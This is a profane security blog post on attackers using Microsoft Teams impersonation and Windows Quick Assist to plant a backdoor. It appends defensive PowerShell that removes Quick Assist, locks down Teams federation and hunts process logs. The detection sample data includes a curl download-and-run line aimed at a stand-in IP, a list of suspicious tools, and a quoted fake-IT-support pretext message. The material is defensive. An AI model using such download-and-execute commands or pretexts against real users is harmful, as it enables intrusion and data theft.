Teams & Quick Assist: Microsoft’s New Gift to Cybercriminals Everywhere

You know how Microsoft keeps banging on about collaboration tools being the future of work? Well, it turns out they accidentally built the future of cybercrime at the same time. Meet the unholy duo: Microsoft Teams and Windows Quick Assist — the Bonnie and Clyde of corporate security breaches.

Since late 2024, cybercriminals have been absolutely rinsing these tools to break into businesses, steal data, and spread malware faster than HR spreads 'mandatory wellbeing' emails. Trend Micro found 21 confirmed breaches in North America alone, plus another 18 in Europe — all thanks to a combination of bad design, bad training, and the unshakable human instinct to trust anything with a Microsoft logo.

How This Absolute Shitshow Works

Step 1: Social Engineering for Dummies

The attacker starts by impersonating IT support on Teams. They message someone in accounts (who has just enough technical knowledge to be dangerous) and say something like:
"Hi Sandra, this is Dave from IT Security. We’ve detected suspicious login attempts on your account. Can we do a quick check using Quick Assist?"

Sandra, who has already had 57 phishing awareness emails this year, thinks: “It’s on Teams, so it must be legit”. Because if you stick a company logo on something, people will believe it’s from God himself.

Step 2: Weaponised Trust (aka Quick Assist Is a Cybercriminal’s Wet Dream)

Quick Assist — for anyone lucky enough to have never used it — is a built-in Windows remote control tool designed to help IT support staff remotely fix problems. It’s like TeamViewer, but shit.

Because it’s a Microsoft tool, it breezes right through corporate security. No one questions it. Users happily copy-and-paste connection codes into chats like they’re swapping biscuit recipes. Once the attacker has remote access, it’s game over. They can:

  • Install malware (usually a lovely infostealer or a sneaky backdoor called ‘BackConnect’ — because why settle for just robbing you once?)

  • Steal passwords (because who doesn’t store them in a plain text file called ‘passwords.docx’?)

  • Exfiltrate data (bonus points if you save everything to ‘OneDrive for Business’ — makes life even easier for the bastards)

  • Disable your security software (Quick Assist runs as whoever is logged in, and in most SMBs that is a local admin, so one ‘Yes’ on the UAC prompt that ‘Dave’ talks her through and they have the keys to the kingdom)

Step 3: The Long Con (Persistent Access for Ongoing Fuckery)

After the first breach, the attackers don’t just bugger off and count their winnings. Oh no. They drop BackConnect, a nasty little backdoor that gives them persistent remote access to your machine, with whatever rights Sandra’s account already had.

With BackConnect, they can log back in anytime they fancy — day, night, bank holiday, doesn’t matter. Your PC is now a hotel room for hackers, permanently reserved for shady activities. If you wipe the malware, no worries — they’ll just social engineer you again because you’re still trusting Teams messages from "Dave in IT".

But It’s Teams — Surely That’s Safe?

Oh, you sweet summer child. Teams is basically email with emojis, and it’s just as insecure. Microsoft loves to pretend Teams is some fortress of collaboration, but in reality:

  • Anyone with a Microsoft 365 tenant, or even a personal Teams account, can message your staff out of the box, because external access is switched on by default (and you haven’t turned it off, have you?).

  • External users can join chats with confusing ‘guest’ labels that half your staff don’t understand.

  • Microsoft’s own phishing protection barely touches Teams unless you pay extra for Defender for Office 365, because nobody in Redmond considered that criminals might use their collaboration tool to collaborate on crimes.

Who’s Getting Screwed?

Pretty much everyone, but the favourites include:

  • SMBs with overstretched IT teams who think "security awareness training" is enough protection.

  • Finance departments because they’ve got the juicy payment data.

  • Anyone who works remotely because home routers are the digital equivalent of a rusty padlock.

  • Anyone who uses ‘password123’ (they deserve it, frankly).

Microsoft’s Response: Shrug Emoji

To their credit, Microsoft did eventually notice that their own tools were being used to fuck over their own customers. Their advice? A deeply unhelpful mixture of:

  • “Train your staff to be suspicious” (cool, because that always works)

  • “Consider restricting Quick Assist access” (why the fuck wasn’t this the default?)

  • “Enable Teams Safe Links” (assuming you pay for Defender for Office 365, via E5, Business Premium or the add-on, which plenty of small businesses don’t)

It’s classic Microsoft: Build a hole, sell the ladder separately.

What’s Actually Needed

If you want to avoid becoming the next Trend Micro case study, here’s what you actually need to do:

1. Turn Off Quick Assist Everywhere

Unless you absolutely need it, bin it. There are better remote tools, and frankly, trusting anything with ‘Quick’ in the name to handle security is a fucking joke.

2. Lock Down External Teams Access

Only allow pre-approved domains to message your staff. External access should be off by default, or at the very least limited to an allow-list. If your company genuinely needs to talk to suppliers on Teams, allow-list their domains or invite the named people as guests. Don’t let every random bastard with an @hotmail.com account message Sandra in accounts.
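Steps 1 and 2 in one script, as an added example that is not from the original post: part (a) strips Quick Assist off a Windows 10/11 endpoint, part (b) restricts Teams federation to an allow-list and blocks personal (unmanaged) Teams accounts. The supplier domains are placeholders; part (b) assumes the MicrosoftTeams PowerShell module and a Teams Administrator account.

```powershell
# Added example, not from the original post. Two parts:
#   (a) endpoint: remove Quick Assist (run as local admin, or push out via
#       Intune / GPO startup script);
#   (b) tenant: lock Teams external access to an allow-list of supplier domains
#       and refuse personal Teams accounts. Needs the MicrosoftTeams module and
#       a Teams Administrator account.
# The supplier domains below are placeholders (an assumption).

#Requires -RunAsAdministrator

# ---- (a) Bin Quick Assist on this endpoint --------------------------------
# Current builds ship Quick Assist as a Store (Appx) package; older Windows 10
# builds ship it as a Windows capability. Remove whichever is present.
Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' |
    Remove-AppxPackage -AllUsers

# Stop it reappearing for new user profiles.
Get-AppxProvisionedPackage -Online |
    Where-Object DisplayName -eq 'MicrosoftCorporationII.QuickAssist' |
    Remove-AppxProvisionedPackage -Online

Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
    Where-Object State -eq 'Installed' |
    Remove-WindowsCapability -Online

# Verify: both lists should come back empty.
$leftovers = @(Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist') +
             @(Get-WindowsCapability -Online -Name 'App.Support.QuickAssist*' |
               Where-Object State -eq 'Installed')
if ($leftovers.Count -eq 0) { Write-Host 'Quick Assist removed.' }
else { Write-Warning "Quick Assist still present: $($leftovers.Name -join ', ')" }

# ---- (b) Lock down Teams external access ----------------------------------
Import-Module MicrosoftTeams
Connect-MicrosoftTeams

# Only these domains can reach your users over Teams federation. Everything
# else, including personal @hotmail.com / @outlook.com Teams accounts, is refused.
$allowedDomains = @('supplier-one.example', 'supplier-two.example')   # placeholders

Set-CsTenantFederationConfiguration `
    -AllowFederatedUsers $true `
    -AllowedDomainsAsAList $allowedDomains `
    -AllowTeamsConsumer $false `
    -AllowTeamsConsumerInbound $false `
    -AllowPublicUsers $false

# Read it back; AllowedDomains should list only your allow-list.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowedDomains,
                  AllowTeamsConsumer, AllowTeamsConsumerInbound, AllowPublicUsers
```

Run part (a) on every endpoint (it is safe to re-run; the removals are no-ops when nothing is installed) and part (b) once per tenant. Setting AllowFederatedUsers to $true with a populated allow-list is the point: leaving the list empty means every tenant on the planet can message Sandra.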

3. Teach Staff to Verify EVERYTHING

If "Dave from IT" messages you out of the blue, call the actual IT team and verify it. If Dave gets offended, he can fuck right off. Real IT staff should love being questioned — it shows the training worked.

4. Monitor for Suspicious Quick Assist Usage

If Quick Assist gets launched on a machine where IT never uses it, that’s a red flag the size of Wales. Turn on process creation auditing so every QuickAssist.exe launch is logged, and review those logs regularly. And if someone fires it up while chatting with a random external contact on Teams, shut it down faster than a pub after last orders.

5. Deploy EDR That Actually Works

Endpoint Detection and Response (EDR) tools should be set to panic mode if Quick Assist launches under an account that isn’t IT’s, or on a machine the helpdesk never touches. And if the process then downloads random files called settingsbackup.dat, set something on fire: you’re already breached.
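Steps 4 and 5 as detection logic, an added example that is not from the original post: it flattens Security log process creation events (ID 4688), flags every QuickAssist.exe launch, and rates it by whether the account is a known helpdesk account and whether suspicious tooling started in the same user session shortly afterwards. The helpdesk account names and the sample records are constructed for the example; it assumes “Audit Process Creation” and “Include command line in process creation events” are enabled.

```powershell
# Added example, not from the original post: hunt 4688 process-creation events
# for Quick Assist launches and suspicious follow-on activity in the same
# session. Assumes process creation auditing with command-line logging is on
# and the shell can read the Security log. Helpdesk accounts are placeholders.

$HelpdeskAccounts   = @('svc-helpdesk', 'dave.it')     # assumption: your real IT accounts
$SuspiciousChildren = @('powershell.exe', 'cmd.exe', 'curl.exe', 'certutil.exe',
                        'rundll32.exe', 'regsvr32.exe', 'mshta.exe', 'bitsadmin.exe')

function Convert-ProcessEvent {
    # Flatten a raw 4688 EventRecord into the fields the hunt needs.
    param([Parameter(Mandatory, ValueFromPipeline)] $Event)
    process {
        $xml = [xml]$Event.ToXml()
        $d = @{}
        foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time    = $Event.TimeCreated
            User    = $d['SubjectUserName']
            Process = $d['NewProcessName']
            Parent  = $d['ParentProcessName']
            Cmd     = $d['CommandLine']
        }
    }
}

function Find-QuickAssistAbuse {
    param(
        [Parameter(Mandatory)] [object[]] $Events,   # output of Convert-ProcessEvent
        [int] $WindowMinutes = 30
    )
    foreach ($launch in ($Events | Where-Object Process -like '*\QuickAssist.exe')) {
        $fromHelpdesk = $HelpdeskAccounts -contains $launch.User
        # Suspicious tooling started by the same user inside the window after launch.
        $followOn = @($Events | Where-Object {
            $_.User -eq $launch.User -and
            $_.Time -gt $launch.Time -and
            $_.Time -le $launch.Time.AddMinutes($WindowMinutes) -and
            $SuspiciousChildren -contains [IO.Path]::GetFileName($_.Process)
        })
        [pscustomobject]@{
            Time     = $launch.Time
            User     = $launch.User
            Severity = $(if (-not $fromHelpdesk -and $followOn) { 'HIGH' }
                         elseif (-not $fromHelpdesk)            { 'MEDIUM' }
                         elseif ($followOn)                     { 'LOW' }
                         else                                   { 'INFO' })
            FollowOn = ($followOn | ForEach-Object {
                           "$([IO.Path]::GetFileName($_.Process)) $($_.Cmd)".Trim() }) -join '; '
        }
    }
}

# Constructed sample records (not real logs) so the logic can be exercised offline.
$qaPath = 'C:\Program Files\WindowsApps\MicrosoftCorporationII.QuickAssist_2.0.0.0_x64__8wekyb3d8bbwe\QuickAssist.exe'
$sample = @(
    [pscustomobject]@{ Time=[datetime]'2025-02-10 10:02'; User='sandra.accounts'; Process=$qaPath; Parent='C:\Windows\explorer.exe'; Cmd='' }
    [pscustomobject]@{ Time=[datetime]'2025-02-10 10:09'; User='sandra.accounts'; Process='C:\Windows\System32\curl.exe'; Parent='C:\Windows\System32\cmd.exe'; Cmd='curl.exe -o settingsbackup.dat http://198.51.100.7/s' }
    [pscustomobject]@{ Time=[datetime]'2025-02-10 10:10'; User='sandra.accounts'; Process='C:\Windows\System32\rundll32.exe'; Parent='C:\Windows\System32\cmd.exe'; Cmd='rundll32.exe settingsbackup.dat,Start' }
    [pscustomobject]@{ Time=[datetime]'2025-02-10 11:00'; User='dave.it'; Process=$qaPath; Parent='C:\Windows\explorer.exe'; Cmd='' }
)
Find-QuickAssistAbuse -Events $sample | Format-Table -AutoSize

# Live run: last 7 days of this machine's Security log.
$live = Get-WinEvent -FilterHashtable @{ LogName='Security'; Id=4688; StartTime=(Get-Date).AddDays(-7) } |
        Convert-ProcessEvent
Find-QuickAssistAbuse -Events $live | Where-Object Severity -ne 'INFO' | Format-Table -AutoSize
```

The rating is deliberately simple: a non-helpdesk account launching Quick Assist is already worth a look (MEDIUM), and the same user’s session spawning curl, rundll32 or friends within half an hour is the “set something on fire” case (HIGH). If you have binned Quick Assist per step 1, every hit is a hit; if you still need it, the helpdesk list is what keeps Dave’s legitimate sessions out of the queue.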

Final Thought

This whole thing is textbook Microsoft: Build a shiny tool, market the shit out of it, completely forget to think about how criminals will abuse it, and then blame the customer when it all goes tits up.

Microsoft’s love affair with collaboration has turned Teams into the world’s friendliest malware delivery platform, and Quick Assist into a remote access trojan that’s already installed on every Windows machine by default. And somehow, this isn’t front-page news — because everyone’s too busy arguing about Windows 11 Start Menu layouts to notice that their entire company is now one fake Teams message away from absolute ruin.

TL;DR:

  • Quick Assist is malware with a Microsoft logo.

  • Teams is phishing with emojis.

  • Your staff will fall for it because humans are trusting idiots.

  • Turn both off, or prepare to join the long, embarrassing list of breached companies blaming Dave from accounts.

Sources

  • Trend Micro Threat Intelligence: analysis of Teams and Quick Assist social engineering attacks

  • Microsoft Security Blog: guidance on Teams and external access risks

  • Infosecurity Magazine: overview of phishing and social engineering trends via Teams

  • BleepingComputer: case studies of Teams abuse by ransomware groups

  • Microsoft Defender documentation: configuring Teams Safe Links and threat protection

Noel Bradford – Head of Technology at Equate Group, Professional Bullshit Detector, and Full-Time IT Cynic

As Head of Technology at Equate Group, my job description is technically “keeping the lights on,” but in reality, it’s more like “stopping people from setting their own house on fire.” With over 40 years in tech, I’ve seen every IT horror story imaginable—most of them self-inflicted by people who think cybersecurity is just installing antivirus and praying to Saint Norton.

I specialise in cybersecurity for UK businesses, which usually means explaining the difference between ‘MFA’ and ‘WTF’ to directors who still write their passwords on Post-it notes. On Tuesdays, I also help further education colleges navigate Cyber Essentials certification, a process so unnecessarily painful it makes root canal surgery look fun.

My natural habitat? Server rooms held together with zip ties and misplaced optimism, where every cable run is a “temporary fix” from 2012. My mortal enemies? Unmanaged switches, backups that only exist in someone’s imagination, and users who think clicking “Enable Macros” is just fine because it makes the spreadsheet work.

I’m blunt, sarcastic, and genuinely allergic to bullshit. If you want gentle hand-holding and reassuring corporate waffle, you’re in the wrong place. If you want someone who’ll fix your IT, tell you exactly why it broke, and throw in some unsolicited life advice, I’m your man.

Technology isn’t hard. People make it hard. And they make me drink.

https://noelbradford.com